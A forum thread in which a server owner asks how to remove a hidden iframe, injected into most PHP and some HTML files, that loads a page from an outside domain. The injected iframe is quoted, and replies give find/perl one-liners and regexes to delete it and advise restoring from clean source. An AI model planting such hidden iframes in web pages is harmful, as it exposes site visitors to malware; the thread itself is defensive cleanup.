# Iframe virus, need to be removed from all phps and html file on linux server

Tags: linux, iframe, command, virus

The following line has been added to almost all the php files and some of the html files on my linux server
WHat is the command to remove this without damaging anything else?

iframe qoluu='V5pEXGSm' src='http://getrelax4you.com/in.cgi?7 ' width='98' height='407' style='display:none'>

The beginning and end of the above line has < >

and will the command search all folders?

Comment: There's no 'line' following your question.

Comment: What "following line" ?  I assume sed could be used to remove the offending line.

Comment: Do you want to remove the whole iframe, or just parts of it?

Comment: @Mikenicee: Your next question should now be: "how did it get there".

Answer (score 3):

Your server has been compromised, simply restore the site files on to a clean server, from your source code repository.

Fixing any user data up may be more tricky, you can no longer trust the  contents of your db, so you have to be very careful. Better luck next time.

Comment: +1 - I actually wanted to answer that, but giving a perl one-liner was more fun ;)

Comment: @Zvrba: Doing anything in perl is going to be a lot more fun :)

Answer (score 2):

Simplified solution, assuming that all virus code is on a single line:

```
find /www/directory -name '*.html' -o -name '*.php' -exec perl -i -ne 'print unless /getrelax4you\.com/' '{}' \;
```

Short explanation: visit all files under /www/directory with html or php extension.  Use perl to edit each file in place by copying all lines verbatim to output, unless they contain string "getrelax4you.com"; which are removed.

Caveat emptor! Make backup before trying this; i might have missed some small detail.

Comment: I'm not a perl hacker, so forgive me if this is stupid, but wont this just remove the "getrelax4you.com" part?

Comment: No, it won't, it will remove the whole line if it matches the given pattern.

Comment: Perhaps something like this? perl -pi -w -e 's!<iframe(\s*\w+\s*=\s*'[^']*'\s*)*src='http://getrelax4you[^']*'(\s*\w+\s*=\s*'[^']*'\s*)*>!<iframe src="">!simg;' *.php

Comment: What if that line is in the has text you dont want to remove?

Comment: @Andre: IMHO, overengineering. It is likely that the whole domain (getrelax4you.com) hosts malware and that no legitimate link on the original pages points there anyway.

Comment: I agree with your assessment re. the domain. I just think it would be prudent to target the offending tag specifically. It is possible that the tag resides on its own line, but it's not guaranteed. I don't know whether the preinfected code had iframes in it or not, and if the iframe tag encloses legitimate markup. If the whole tag (begin and end) was injected by the virus then I would modify the regex to remove all the offending code.

Comment: @zvrba: That's not overengineering, this is overengineering(:D): s!<iframe(\s*\w+\s*=\s*('[^']*'|"[^"]*")\s*)*src=('[^']*getrelax4you[^']*'|"[^"]*getrelax4you[^"]*")(\s*\w+\s*=\s*('[^']*'|"[^"]*")\s*)*>((.*?)</iframe>)?!!simg;

Comment: There is nothing after that line. And the now I realize that code is missing after it. It truncated the remaining code.  Not good.